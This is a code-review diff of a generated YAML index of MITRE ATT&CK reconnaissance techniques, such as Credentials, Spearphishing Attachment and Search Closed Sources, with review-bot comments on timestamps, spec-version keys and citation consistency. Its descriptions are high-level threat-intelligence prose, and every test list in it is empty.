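Review bot: at the `SecurityTrails Google Hacking` reference in this hunk the `url` now points at `https://www.recordedfuture.com/...google-dorks` while `source_name` still says SecurityTrails and the description still credits `Borges, E. (2019, March 5)`, so the citation label, author and host no longer agree; the same retarget appears for T1593 further down in this diff, so at least the index is internally consistent. Since these values come from upstream ATT&CK data, this should be raised upstream rather than hand-edited in the generated index.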
@@ -55288,7 +55977,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -55304,8 +55993,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
@@ -55366,29 +56053,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -55397,15 +56065,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
@@ -55431,7 +56118,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -55449,47 +56136,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55498,19 +56148,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
@@ -55533,7 +56219,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -55549,8 +56235,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
@@ -55576,7 +56260,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -55592,8 +56276,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -55621,7 +56303,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -55637,12 +56319,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55651,16 +56331,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -55673,8 +56353,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -55685,52 +56365,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
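Review bot: `spec_version: '2.1'` is dropped from this object (and from every object touched in this diff) while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0 and is re-emitted at the end of the object; confirm that nothing downstream of the YAML index keys on `spec_version`, because the removal is silent. The `D3Secutrity CTI Feeds` reference (typo included) is removed together with its `(Citation: ...)` in the description, so the citation/reference pair for T1597 stays consistent.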
@@ -55752,7 +56430,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
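Review bot: the `modified` timestamp moves backwards here (2022-04-25 to 2021-04-15), and the same regression recurs for several other unchanged sub-techniques further down the diff. That is only expected if the previously committed index was generated from a bundle that rewrote `modified` in bulk; confirm the bundle used for this regeneration is the intended ATT&CK release rather than an older snapshot, since the timestamp is the only change for these objects.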
@@ -55768,8 +56446,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
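Review bot: `x_mitre_attack_spec_version` is removed from T1592.003 without a replacement, whereas T1597 above gains `x_mitre_attack_spec_version: 3.2.0` and T1595.003 further down keeps `2.1.0`; after this change the index carries the key for some objects and not others. If any consumer of the index treats the key as required, the generator should emit it for every object rather than mirroring whatever the source object happens to contain.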
@@ -55795,7 +56471,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -55813,8 +56489,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -55836,7 +56510,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -55852,12 +56526,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -55867,17 +56539,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
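Review bot: the rewritten description introduces three citations (`Bleeping Computer 2easy 2021`, `SecureWorks Infostealers 2023`, `Bleeping Computer Stealer Logs 2023`) that each need a matching `source_name` under `external_references`; the hunks below add all three, so that pairing is satisfied. Separately, the seven leak citations (`Register Deloitte` through `CNET Leaks`) now sit directly after `(Citation: ATT ScanBox)` rather than after the "leaks to online or other accessible data sets" sentence they support, which has moved to the next paragraph with no citation attached; this is upstream ATT&CK wording reproduced verbatim, so it should not be patched here but is worth reporting upstream.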
@@ -55889,6 +56564,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -55899,7 +56575,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -55909,6 +56585,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -55921,6 +56601,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -55943,6 +56627,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -55950,9 +56638,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -56011,7 +56698,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56031,7 +56718,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
@@ -56053,7 +56739,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56069,12 +56755,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -56143,7 +56827,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
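Review bot: replacing the dead cyber.gov.au URL with a web.archive.org snapshot (20210708014107) is the right fix, but the citation text still reads "Retrieved October 19, 2020", which predates the snapshot; upstream keeps the original retrieval date by convention, so no edit is needed here, just be aware the date and the archived URL will not agree.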
@@ -56191,31 +56875,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
